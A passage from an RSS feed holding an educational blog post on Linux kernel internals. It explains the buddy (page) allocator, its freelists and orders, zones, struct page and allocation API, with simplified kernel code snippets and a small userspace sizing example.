]]></content:encoded></item><item><title>Linternals: Introducing Memory Allocators &amp; The Page Allocator</title><description>I know you&amp;#39;ve all been waiting for it, that&amp;#39;s right, we&amp;#39;re going to be taking a dive into another exciting aspect of Linux internals: memory allocators!</description><link>https://sam4k.com/linternals-memory-allocators-part-1/</link><guid isPermaLink="false">61cdb1e6484d4d42c8e4a679</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Fri, 10 Jun 2022 16:30:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/04/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>I know you&rsquo;ve all been waiting for it, that&rsquo;s right, we&rsquo;re going to be taking a dive into another exciting aspect of Linux internals: memory allocators!</p>
<p>Don&rsquo;t worry, I haven&rsquo;t forgotten about the <a href="https://sam4k.com/linternals-virtual-memory-part-1/">virtual memory series</a>, but today I thought we&rsquo;d spice things up and shift our focus towards memory allocation in the Linux kernel. As always, I&rsquo;ll aim to lay the groundwork with a high level overview of things before gradually diving into some more detail.</p>
<p>In this first part (of many, no doubt), we&rsquo;ll cover the role of memory allocators within the Linux kernel at a high level to give some general context on the topic. We&rsquo;ll then take a look at the first of two types of allocator used by the kernel: the buddy (page) allocator.</p>
<p>We&rsquo;ll cover the high level implementation of the buddy allocator, with some code snippets from the kernel to complement this understanding, before diving into some more detail and wrapping things up by talking about some pros/cons of the buddy allocator.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x01-so-memory-allocators">0x01 So, Memory Allocators?</a></li>
<li><a href="#0x02-the-buddy-page-allocator">0x02 The Buddy (Page) Allocator</a>
<ul>
<li><a href="#page-primer">Page Primer</a></li>
<li><a href="#buddy-system-algorithm">Buddy System Algorithm</a></li>
<li><a href="#nodes-zones-memory-stuff">Nodes, Zones &amp; Memory Stuff</a>
<ul>
<li><a href="#expanding-on-freearea">Expanding on free_area</a></li>
<li><a href="#touching-on-struct-page">Touching on struct page</a></li>
</ul>
</li>
<li><a href="#using-the-buddy-allocator">Using The Buddy Allocator</a></li>
<li><a href="#pros-cons">Pros &amp; Cons</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<h2 id="0x01-so-memory-allocators">0x01 So, Memory Allocators?</h2>
<p>Alright, let&rsquo;s get stuck in! Like I mentioned, we&rsquo;ll start with the basics - what is a memory allocator? I could just say we&rsquo;re talking about a collection of code which looks to manage available memory, typically providing an API to <code>allocate()</code> and <code>free()</code> this memory.  </p>
<p>But what does that mean? For a moment let&rsquo;s forget about the complexities of modern day memory management in OS&rsquo;s, with all the various interconnected components:</p>
<p>Picture a computer with some physical memory, running a Linux kernel and a lot of usermode processes (think of all the chrome tabs). Both the kernel and the various user processes require physical memory to store the various data behind the virtual mappings we covered in parts <a href="https://sam4k.com/linternals-virtual-memory-0x02/">2</a> &amp; <a href="https://sam4k.com/linternals-virtual-memory-part-3/">3</a> of the virtual memory series.</p>
<p><img src="https://sam4k.com/content/images/2022/06/this_is_fine.gif" alt=""></p>
<p>Now picture the absolute chaos as processes are using the same physical memory addresses at the same time, clobbering each other&rsquo;s data, oh lord, even the kernel&rsquo;s data is getting overwritten? Is that chrome tab even using a physical address that exists?!</p>
<p>That is where the kernel&rsquo;s memory allocator comes in, acting as a gatekeeper of sorts for allocating memory when it is needed. Its job is to keep track of how much memory there is, what&rsquo;s free and what&rsquo;s in use.</p>
<p><img src="https://sam4k.com/content/images/2022/06/you_shall_not_pass.gif" alt=""></p>
<p>Rather than every process for themselves, if something requires a chunk of memory to store stuff in, it asks the memory allocator - simple enough right?</p>
<h2 id="0x02-the-buddy-page-allocator">0x02 The Buddy (Page) Allocator</h2>
<p>Now we&rsquo;ve got a high level understanding of memory allocators, let&rsquo;s take a look at how memory is managed and allocated in the Linux kernel.</p>
<p>While several implementations for memory allocation exist within the Linux kernel, they mainly work on top of the buddy allocator (aka page allocator), making it the fundamental memory allocator within the Linux kernel.  </p>
<h3 id="page-primer">Page Primer</h3>
<p>At this point, we should probably rewind and clarify what exactly a &ldquo;page&rdquo; is. As part of its memory management approach, the Linux kernel (along with the CPU) divides virtual memory into &ldquo;pages&rdquo; which are <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18"><code>PAGE_SIZE</code></a> bytes of contiguous virtual memory.</p>
<p>Typically defined as <code>0x1000</code> bytes, or 4KB, pages are the common unit for managing memory in the Linux kernel. This is why you&rsquo;ll often see things in memory aligned on page boundaries, for example.</p>
<p>Anyway, while a fascinating topic, I&rsquo;ll not derail us too much! However this is definitely something I&rsquo;ll touch on in more detail in future posts, so don&rsquo;t worry :)</p>
<p>❗</p>
<p>Going forward, unless I&rsquo;m explicit, in examples using <code>PAGE_SIZE</code>, I&rsquo;ll assume a typical <code>PAGE_SIZE</code> of <code>0x1000</code>.</p>
<h3 id="buddy-system-algorithm">Buddy System Algorithm</h3>
<p>Back to the topic at hand - we&rsquo;ve covered where the &ldquo;page&rdquo; in page allocator comes from, what about the buddy part? Cue the buddy system algorithm (BSA) behind the buddy allocator, starting with the basics:</p>
<p>The buddy allocator tracks <strong>free</strong> chunks of <strong>physically contiguous</strong> memory via a freelist, <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L632"><code>free_area[MAX_ORDER]</code></a>, which is an array of <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L108"><code>struct free_area</code></a>.</p>
<p>Each <code>struct free_area</code> in the freelist contains a doubly linked circular list (the <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/types.h#L178"><code>struct list_head</code></a>) pointing to the free chunks of memory.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">struct free_area        free_area[MAX_ORDER]; 
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">struct free_area {
</span></span><span class="line"><span class="cl">    struct list_head    free_list; 
</span></span><span class="line"><span class="cl">    unsigned long       nr_free;
</span></span><span class="line"><span class="cl">};
</span></span></code></pre></div><p><strong>simplified</strong> from <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h">/include/linux/mmzone.h</a></p>
<p>Each <code>struct free_area</code>&rsquo;s linked list points to free, physically contiguous chunks of memory which are all the same size. The buddy allocator uses the index into the freelist, <code>free_area[]</code>, to categorise the size of these free chunks of memory.</p>
<p><img src="https://sam4k.com/content/images/2022/06/image-3.png" alt=""></p>
<p>This index is called the &ldquo;order&rdquo; of the list: the free chunks of memory it points to are each <code>2<sup>order</sup> * </code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18"><code>PAGE_SIZE</code></a> bytes in size, such that:</p>
<ul>
<li><code>free_area[0]</code> is a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>2<sup>0</sup> * 0x1000</code> bytes == <code>0x1000</code> bytes AKA order-0 pages.</li>
<li><code>free_area[1]</code> is a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>2<sup>1</sup> * 0x1000</code> bytes == <code>0x2000</code> bytes AKA order-1 pages.</li>
<li>&hellip;</li>
<li><code>free_area[<a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L28">MAX_ORDER</a> - 1]</code>, the last entry in the array, is a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>2<sup>MAX_ORDER - 1</sup> * 0x1000</code> bytes</li>
</ul>
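<p>The arithmetic above is easy enough to play with in userspace. The snippet below is a small sketch, assuming 4KB pages and <code>MAX_ORDER</code> of 11 (the v5.18 default); the function names are my own, and the kernel has its own helper, <code>get_order()</code>, for going from a size to an order:</p>

```c
#include <stddef.h>

#define PAGE_SIZE 0x1000UL  /* assumed 4KB pages, as elsewhere in this post */
#define MAX_ORDER 11        /* assumed v5.18 default: valid orders are 0..10 */

/* Size in bytes of one chunk on the order-n freelist: 2^order * PAGE_SIZE. */
unsigned long order_to_bytes(unsigned int order)
{
    return PAGE_SIZE << order;
}

/*
 * Smallest order whose chunk size can hold `bytes` bytes.
 * Returns MAX_ORDER if the request is too big for any freelist.
 */
unsigned int bytes_to_order(unsigned long bytes)
{
    unsigned int order = 0;

    while (order < MAX_ORDER && order_to_bytes(order) < bytes)
        order++;
    return order;
}
```

<p>So <code>order_to_bytes(1)</code> gives us <code>0x2000</code>, and a <code>0x4000</code> byte request rounds to order 2, while <code>0x4001</code> bytes would tip over into order 3.</p>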
<p>Okay, what&rsquo;s this got to do with buddies Sam?! Good question! One that brings us onto how the buddy allocator (de)allocates all this free memory it tracks.</p>
<p>Being the buddy <em><strong>allocator</strong></em>, it provides an API for users to both allocate and free all these various sized, physically contiguous chunks of memory. If we want to call the equivalent of <code>allocate(0x4000 bytes)</code>, what does this look like at a high level?</p>
<ol>
<li>
<p>Determine what order-n page satisfies the size of our allocation, in maths world, they do this via log stuff: <code>log2(alloc_size_in_pages)</code>, rounded up to the nearest int, will give us the appropriate order! Here, it&rsquo;s 2.</p>
</li>
<li>
<p>As the order is also the index into the freelist, we can check the corresponding <code>free_area[2]-&gt;free_list</code> to find a free chunk. If there is one, hoorah! We dequeue it from the list as it&rsquo;s no longer free and we can tell the caller about their newly acquired memory</p>
</li>
<li>
<p>However, if <code>free_area[2]-&gt;free_list</code> is empty, the buddy allocator will check the <code>free_list</code> of the next order up, in this case <code>free_area[3]-&gt;free_list</code>. If there&rsquo;s a free chunk, the allocator will then do the following:</p>
</li>
</ol>
<ul>
<li>Remove the chunk from <code>free_area[3]-&gt;free_list</code></li>
<li>Halve the chunk (as any order-n page is guaranteed to be exactly twice the size of the order-n-1 page, as well as being physically contiguous in memory), creating two buddies! (I told you we&rsquo;d get round to it!)</li>
<li>One chunk is returned to the caller who requested the allocation, while the other chunk is now migrated to the order-n-1 list, <code>free_area[2]-&gt;free_list</code> in this case</li>
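<li>On freeing, the allocator will check whether the chunk&rsquo;s physically adjacent buddy is also free; if it is, the two are merged back into a single chunk of the next order up, and this repeats until there is no free buddy left to merge with or the highest order is reached</li>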
</ul>
<p><img src="https://sam4k.com/content/images/2022/06/buddy_split.gif" alt=""></p>
<p>that&rsquo;s right, i made a gif</p>
<ol start="4">
<li>If <code>free_area[3]-&gt;free_list</code> is also empty, the allocator will continue to check the higher order freelists until either it finds a free chunk or the request fails (if there are no free chunks in any of the higher orders either).</li>
</ol>
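<p>The steps above can be sketched as a toy, userspace buddy allocator. To be clear, this is not how the kernel implements it: the names, the tiny 8-page &ldquo;memory&rdquo; and the boolean table standing in for the linked lists are all assumptions made to keep the example short. It only models the split-on-allocate and merge-on-free behaviour:</p>

```c
#include <stdbool.h>

#define TOY_MAX_ORDER 4                            /* orders 0..3: toy value */
#define TOY_NR_PAGES  (1u << (TOY_MAX_ORDER - 1))  /* one order-3 chunk = 8 pages */

/* free_at[order][pfn] is true when a free chunk of that order starts at pfn. */
static bool free_at[TOY_MAX_ORDER][TOY_NR_PAGES];

void toy_init(void)
{
    for (unsigned int o = 0; o < TOY_MAX_ORDER; o++)
        for (unsigned int p = 0; p < TOY_NR_PAGES; p++)
            free_at[o][p] = false;
    free_at[TOY_MAX_ORDER - 1][0] = true;  /* all memory starts as one big chunk */
}

/* Take any free chunk of exactly this order; returns its pfn or -1. */
static int take_free(unsigned int order)
{
    for (unsigned int p = 0; p < TOY_NR_PAGES; p += 1u << order) {
        if (free_at[order][p]) {
            free_at[order][p] = false;
            return (int)p;
        }
    }
    return -1;
}

/* Allocate 2^order pages; returns the first pfn, or -1 on failure. */
int toy_alloc(unsigned int order)
{
    for (unsigned int cur = order; cur < TOY_MAX_ORDER; cur++) {
        int pfn = take_free(cur);
        if (pfn < 0)
            continue;                      /* empty freelist: try the next order up */
        while (cur > order) {              /* split, keeping the lower half */
            cur--;
            free_at[cur][(unsigned int)pfn + (1u << cur)] = true;  /* upper buddy is freed */
        }
        return pfn;
    }
    return -1;
}

/* Free a chunk, merging with its buddy for as long as the buddy is free. */
void toy_free(int pfn, unsigned int order)
{
    while (order < TOY_MAX_ORDER - 1) {
        unsigned int buddy = (unsigned int)pfn ^ (1u << order);
        if (!free_at[order][buddy])
            break;
        free_at[order][buddy] = false;     /* pull the buddy off its list */
        if ((int)buddy < pfn)
            pfn = (int)buddy;              /* merged chunk starts at the lower pfn */
        order++;
    }
    free_at[order][pfn] = true;
}
```

<p>The neat trick is in <code>toy_free()</code>: because chunks are naturally aligned to their size, a chunk&rsquo;s buddy is always found by flipping a single bit of its page frame number, <code>pfn ^ (1 &lt;&lt; order)</code>.</p>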
<p><img src="https://sam4k.com/content/images/2022/06/we_made_it.gif" alt=""></p>
<p>And there we are, a grossly-simplified (as always) overview of the buddy allocator within the Linux kernel. Perhaps I made a mistake intertwining code snippets and kernel specifics with a simplified approach, but hopefully it all made sense!</p>
<h3 id="nodes-zones-memory-stuff">Nodes, Zones &amp; Memory Stuff</h3>
<p>Okay, so we&rsquo;ve covered things at a fairly high level, but I&rsquo;d be remiss if I didn&rsquo;t clarify some of the specifics I glossed over in the last section, so buckle up.</p>
<p>First of all, in theme with our ongoing virtual memory series, let&rsquo;s clarify what exactly is being allocated here. We already know we&rsquo;re dealing with pages of memory, but where?</p>
<p>The buddy allocator is a virtual memory allocator, although it allocates from the kernel region defined by <code>__PAGE_OFFSET_BASE</code> (aka lowmem aka physmap) which you&rsquo;ll recall<a href="https://sam4k.com/linternals-virtual-memory-part-3/">[1]</a> is a 1:1 virtual mapping of physical memory. That is, lowmem address x+1 maps to physical address y+1, x+2 to y+2, x+N to y+N etc., so virtually contiguous memory from this region is guaranteed to be physically contiguous too.</p>
<p>Keeping things relatively brief again, the Linux kernel organises physical memory into a tree-like hierarchy of <em>nodes</em> made up of <em>zones</em> made up of <em>page frames[2]:</em></p>
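<p>As a quick illustration of that 1:1 relationship, here&rsquo;s a sketch of the address arithmetic. The base used is the default x86_64 value for 4-level paging without KASLR, which is an assumption on my part (with KASLR the base is randomised at boot), and the <code>toy_</code> functions are stand-ins rather than the kernel&rsquo;s own conversion helpers:</p>

```c
#include <stdint.h>

/*
 * Assumed base of the direct mapping: the default x86_64 value for
 * 4-level paging without KASLR. A real system may use a different one.
 */
#define PAGE_OFFSET_BASE 0xffff888000000000ULL

/* Direct-map (physmap) virtual address for a physical address. */
uint64_t toy_phys_to_virt(uint64_t phys)
{
    return PAGE_OFFSET_BASE + phys;
}

/* Physical address behind a direct-map virtual address. */
uint64_t toy_virt_to_phys(uint64_t virt)
{
    return virt - PAGE_OFFSET_BASE;
}
```

<p>Since the conversion is just a constant offset, two addresses that are <code>0x1000</code> apart in the physmap are also <code>0x1000</code> apart physically, which is exactly the contiguity guarantee described above.</p>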
<ul>
<li><strong>Nodes</strong>: these data structures, represented by <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L934"><code>pg_data_t</code></a>, are abstractions of actual physical hardware stuff, specifically a node represents a &ldquo;bank&rdquo; of physical memory</li>
<li><strong>Zones</strong>: suffice to say nodes are made up of zones, represented by <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L514"><code>struct zone</code></a>, which represent ranges within memory</li>
<li><strong>Page frames</strong>: zones are then made up of pages, represented by <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72"><code>struct page</code></a>. Where a page describes a fixed-length (<code>PAGE_SIZE</code>) contiguous block of virtual memory, a page frame is a fixed-length contiguous block of physical memory that pages are mapped to</li>
</ul>
<h4 id="expanding-on-freearea">Expanding on <code>free_area</code></h4>
<p><img src="https://sam4k.com/content/images/2022/06/why_doing_this_to_me.gif" alt=""></p>
<p>Why am I burdening you with this knowledge? The answer is because not only did I leave out some details in the code snippet above but I straight up altered it (it was for your own good, I swear), so now I&rsquo;m going to correct my wrongs by unveiling the truth:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">free_area</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">struct</span> <span class="n">list_head</span>    <span class="n">free_list</span><span class="p">[</span><span class="n">MIGRATE_TYPES</span><span class="p">];</span> 
</span></span><span class="line"><span class="cl">    <span class="kt">unsigned</span> <span class="kt">long</span>       <span class="n">nr_free</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">zone</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">    <span class="cm">/* free areas of different sizes */</span>
</span></span><span class="line"><span class="cl">    <span class="k">struct</span> <span class="n">free_area</span>    <span class="n">free_area</span><span class="p">[</span><span class="n">MAX_ORDER</span><span class="p">];</span> 
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Okay, let&rsquo;s unpack this. The buddy allocator actually keeps track of multiple freelists, <code>free_area[]</code>, specifically one per zone. We can see that here, as the freelist is actually a member of the <code>struct zone</code> which we touched on a moment ago.</p>
<p>Why? Err, good question. I won&rsquo;t delve into the nuances of NUMA/UMA systems and all that stuff but suffice to say when the buddy allocator is asked to allocate some memory, it may want to pick a zone from the node that is associated with the calling context (think &ldquo;closest&rdquo; node or most optimal).</p>
<p>Now that we have the full(ish) context, we can do a little bit of introspection and get some hands on using our ol&rsquo; faithful <code>procfs</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ cat /proc/buddyinfo 
</span></span><span class="line"><span class="cl">----- zone info ------|    0   |  1   |  2   |  3   |  4   |  5   |  6   |  7   |  8   |  9   | 10  
</span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------------------------
</span></span><span class="line"><span class="cl">Node 0, zone      DMA      0      0      0      0      0      0      0      0      1      1      2 
</span></span><span class="line"><span class="cl">Node 0, zone    DMA32  11311   2358   1052    567    290    123     52     33     18     25      8 
</span></span><span class="line"><span class="cl">Node 0, zone   Normal   5977    942   2093   1983    804    256     93     45     28     39      4 
</span></span></code></pre></div><p>I&rsquo;ve added some headers in (lines 2-3), but what we&rsquo;re seeing here is a row for each zone&rsquo;s buddy allocator freelist, <code>free_area[MAX_ORDER]</code>. The first column tells us the node and zone, then each column after that tells us how many free chunks (<code>nr_free</code>) there are for each page order, starting from order 0 and moving up to order <code>MAX_ORDER - 1</code>. Neat, right?</p>
<p>Moving back to the deception, the doubly linked circular list we said pointed to all the free chunks? Well that&rsquo;s actually an array of doubly linked circular lists: <code>free_list[MIGRATE_TYPES]</code>. Don&rsquo;t worry though, each list in the array still points to free chunks. Pages of different types, defined by <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L67"><code>enum migratetype</code></a> (whose final entry, <code>MIGRATE_TYPES</code>, gives the number of types), are just stored in separate lists in this array.</p>
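<p>Because each column counts chunks rather than pages, working out how much memory a zone actually has free means weighting column <em>i</em> by 2<sup><em>i</em></sup>. Here&rsquo;s a small sketch that does this for a single row of <code>/proc/buddyinfo</code>; the function name is made up and it assumes the row format shown above:</p>

```c
#include <stdio.h>
#include <stdlib.h>

/*
 * Total free pages described by one /proc/buddyinfo row, e.g.
 * "Node 0, zone   Normal   5977    942 ...".
 * Column i counts free chunks of order i, each worth 2^i pages.
 * Returns -1 if the row does not look like a buddyinfo line.
 */
long buddyinfo_free_pages(const char *row)
{
    int node, consumed = 0;
    char zone[32];
    long total = 0;

    /* %n records how many characters the "Node N, zone NAME" prefix used. */
    if (sscanf(row, "Node %d, zone %31s%n", &node, zone, &consumed) != 2)
        return -1;

    const char *p = row + consumed;
    for (unsigned int order = 0; order < 32; order++) {
        char *end;
        long count = strtol(p, &end, 10);

        if (end == p)
            break;                  /* no more numbers on this row */
        total += count << order;    /* count chunks of 2^order pages each */
        p = end;
    }
    return total;
}
```

<p>For the <code>DMA</code> row in the output above that&rsquo;s 1 order-8 chunk, 1 order-9 chunk and 2 order-10 chunks: 256 + 512 + 2048 = 2816 free pages, or 11MB with 4KB pages.</p>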
<h4 id="touching-on-struct-page">Touching on <code>struct page</code></h4>
<p>Although I&rsquo;m planning to cover this in much more detail in the virtual memory series, I feel like it&rsquo;s worth touching on this goliath so as to fill in some gaps in our overview.</p>
<p>So we&rsquo;ve already mentioned that each physical page (page frame) in the system has a <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72"><code>struct page</code></a> associated with it. This tracks various metadata and is instrumental to the kernel&rsquo;s memory management model.</p>
<p>Given that these represent physical pages, it might not come as a surprise to learn that the &ldquo;free chunks&rdquo; that <code>free_area-&gt;free_list</code> points to are actually references to page structs. We can see that here by poking around <a href="https://elixir.bootlin.com/linux/v5.18.3/source/mm/page_alloc.c#L2986">mm/page_alloc.c</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm"> * Do the hard work of removing an element from the buddy allocator.
</span></span></span><span class="line"><span class="cl"><span class="cm"> * Call me with the zone-&gt;lock already held.
</span></span></span><span class="line"><span class="cl"><span class="cm"> */</span>
</span></span><span class="line"><span class="cl"><span class="k">static</span> <span class="n">__always_inline</span> <span class="k">struct</span> <span class="n">page</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="nf">__rmqueue</span><span class="p">(</span><span class="k">struct</span> <span class="n">zone</span> <span class="o">*</span><span class="n">zone</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">order</span><span class="p">,</span> <span class="kt">int</span> <span class="n">migratetype</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">						<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">alloc_flags</span><span class="p">)</span>
</span></span></code></pre></div><p>Note the return type here, <code>struct page *</code> (we also see familiar qualifiers: zone, order, migrate type and flags).</p>
<p>Okay, whew, with that all cleared up, I think we have a reasonable overview of the buddy allocator within the Linux kernel! Hope you&rsquo;re still with me as we&rsquo;re not done yet!</p>
<hr>
<ol>
<li><a href="https://sam4k.com/linternals-virtual-memory-part-3/">https://sam4k.com/linternals-virtual-memory-part-3/</a></li>
<li>More on the topic here <a href="https://www.kernel.org/doc/gorman/html/understand/understand005.html">https://www.kernel.org/doc/gorman/html/understand/understand005.html</a></li>
</ol>
<h3 id="using-the-buddy-allocator">Using The Buddy Allocator</h3>
<p><img src="https://sam4k.com/content/images/2022/06/i_want_to_try.gif" alt=""></p>
<p>I figured I should get into the habit of promoting some kernel development hijinx and explore some of the APIs for the topics we discuss where relevant.</p>
<p>Let&rsquo;s dive in then and highlight some of the API exposed to kernel developers for use in modules &amp; device drivers. All defs can be found in <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h"><code>/include/linux/gfp.h</code></a>:</p>
<ul>
<li><code>alloc_pages(gfp_mask, order)</code>: Allocate 2<sup>order</sup> pages (one physically contiguous chunk from the order N freelist) and return a pointer to the first page&rsquo;s <code>struct page</code></li>
<li><code>alloc_page(gfp_mask)</code>: macro for <code>alloc_pages(gfp_mask, 0)</code></li>
<li><code>__get_free_pages(gfp_mask, order)</code> and <code>__get_free_page(gfp_mask)</code> mirror the above functions, except they return a virtual address to the allocation as opposed to a <code>struct page</code></li>
<li>For freeing, options include: <code>__free_page(struct page *page)</code>, <code>__free_pages(struct page *page, order)</code> and <code>free_page(unsigned long addr)</code>, the last of which takes the virtual address returned by <code>__get_free_page()</code></li>
<li>Plenty more to see if you take a browse of <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h"><code>/include/linux/gfp.h</code></a></li>
</ul>
<p>Most of that should be fairly familiar at this point, except the <code>gfp_mask</code>, which we haven&rsquo;t covered. The <code>gfp_mask</code> is a set of GFP (Get Free Page) flags which let us configure the behaviour of the allocator; they&rsquo;re used throughout the kernel&rsquo;s memory management code.</p>
<p>The inline documentation<a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271">[1]</a> already does a good job at covering the different flags, so I won&rsquo;t rehash that here. In my experience, the ones you&rsquo;ll mostly come across are <code>GFP_KERNEL</code>, <code>GFP_KERNEL_ACCOUNT</code>[2] and <code>GFP_ATOMIC</code>.</p>
<p>Despite a flexible API for different allocation use cases and requirements, they all ultimately call the real MVP, <code>__alloc_pages()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">/*
</span></span><span class="line"><span class="cl"> * This is the &#39;heart&#39; of the zoned buddy allocator.
</span></span><span class="line"><span class="cl"> */
</span></span><span class="line"><span class="cl">struct page *__alloc_pages(gfp_t gfp, unsigned int order, int preferred_nid,
</span></span><span class="line"><span class="cl">							nodemask_t *nodemask)
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.3/source/mm/page_alloc.c#L5370">/mm/page_alloc.c</a></p>
<p>We&rsquo;ve already covered a lot of ground in this post, so I&rsquo;ll leave it as an exercise to the reader to take a look at this function to see what we&rsquo;ve covered so far in actual code :)</p>
<p>I&rsquo;ll also use this as an opportunity to plug my long neglected repo (but I plan to push some demos for Linternals posts up too, maybe), &ldquo;lmb&rdquo; aka Linux Misc driver Boilerplate; a very lightweight kernel module boilerplate for bootstrapping kernel fun.</p>
<p><a href="https://github.com/sam4k/lmb">GitHub - sam4k/lmb: Very lightweight kernel module boilerplate for kernel development/testing.</a></p>
<hr>
<ol>
<li><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271">https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271</a></li>
<li><a href="https://twitter.com/poppop7331">@poppop7331</a> and <a href="https://twitter.com/vnik5287">@vnik5287</a> recently <a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">did a cool blog</a> post covering modern heap exploitation, including the implications of <code>GFP_KERNEL_ACCOUNT</code> in recent kernel versions :)</li>
</ol>
<h3 id="pros-cons">Pros &amp; Cons</h3>
<p><img src="https://sam4k.com/content/images/2022/06/impatient_judy.gif" alt=""></p>
<p>Before we wrap up, and to give some context on the next section, let&rsquo;s take what we&rsquo;ve learned about the buddy allocator and highlight some of its pros and cons.</p>
<p>First of all, due to the nature of the buddy system algorithm behind things, the buddy allocator is fast to (de)allocate memory. Furthermore, being able to split and remerge chunks on the go, there is little external fragmentation (this is where there&rsquo;s enough free memory to serve a request, just not in one contiguous chunk).</p>
<p>There are also other perf benefits, which we won&rsquo;t dive into here, to providing physically contiguous memory and guaranteeing cache aligned memory blocks.</p>
<p>The main downside here is the internal fragmentation, where the chunk of memory allocated is bigger than necessary, leaving a portion of it unused. Due to the fixed sizes, determined by 2<sup>order</sup> pages, if a request is just too big for one order it gets bumped up to the next, and we&rsquo;re gonna have a great deal of space wasted. Not to mention the smallest allocation is 1 page.</p>
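<p>To put some rough numbers on that, here&rsquo;s a minimal userspace sketch (not kernel code) that works out which order a request lands in and how much of the block goes unused. It assumes 4 KiB pages, and <code>order_for_size()</code> and <code>wasted_bytes()</code> are hypothetical helpers made up for illustration; the first loosely mirrors what the kernel&rsquo;s <code>get_order()</code> does:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stddef.h&gt;
#include &lt;stdio.h&gt;

#define PAGE_SIZE 4096UL /* assumption: 4 KiB pages, as is typical on x86_64 */

/* Hypothetical helper: smallest order such that (PAGE_SIZE &lt;&lt; order) &gt;= size. */
static unsigned int order_for_size(size_t size)
{
    unsigned int order = 0;

    while ((PAGE_SIZE &lt;&lt; order) &lt; size)
        order++;
    return order;
}

/* Hypothetical helper: bytes left unused when size bytes come from a 2^order page block. */
static size_t wasted_bytes(size_t size)
{
    return (PAGE_SIZE &lt;&lt; order_for_size(size)) - size;
}

int main(void)
{
    size_t sizes[] = { 100, 4096, 4097, 3 * 4096 + 1, 64 * 1024 + 1 };

    for (size_t i = 0; i &lt; sizeof(sizes) / sizeof(sizes[0]); i++)
        printf("request %7zu bytes: order %u, %7zu bytes wasted\n",
               sizes[i], order_for_size(sizes[i]), wasted_bytes(sizes[i]));
    return 0;
}
</code></pre></div><p>A request for 4097 bytes, just one byte over a page, lands in order 1 and leaves 4095 bytes unused.</p>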
<p>tl;dr: fast, contiguous allocations, low external fragmentation, bad internal fragmentation</p>
<h3 id="wrapping-up">Wrapping Up</h3>
<p>Memory allocation and management is an extremely complex topic with a lot of nuance which, as we saw, extends down to the hardware level.</p>
<p>Hopefully this has been a useful primer on one of the fundamentals to kernel memory allocation, the buddy allocator:</p>
<ul>
<li>We covered the role of memory allocators briefly, before learning that the buddy allocator acts as a fundamental memory allocation mechanism within the Linux kernel</li>
<li>We learned at a high level about the buddy system algorithm behind the buddy allocator, with some peeks into the actual kernel code from the mm system</li>
<li>Finally we pieced together our understanding with some extras on how memory is managed by the kernel, its API and the pros/cons of the buddy allocator</li>
</ul>
<h2 id="next-time">Next Time!</h2>
<p><img src="https://sam4k.com/content/images/2022/06/hooray.gif" alt=""></p>
<p>The fun doesn&rsquo;t end here, don&rsquo;t you worry! We&rsquo;ve just scratched the surface. I hope you&rsquo;re ready to expand your repertoire of acronyms cos next time we&rsquo;ll be exploring the wonderful world of slab allocators: SLAB, SLUB &amp; SLOB.</p>
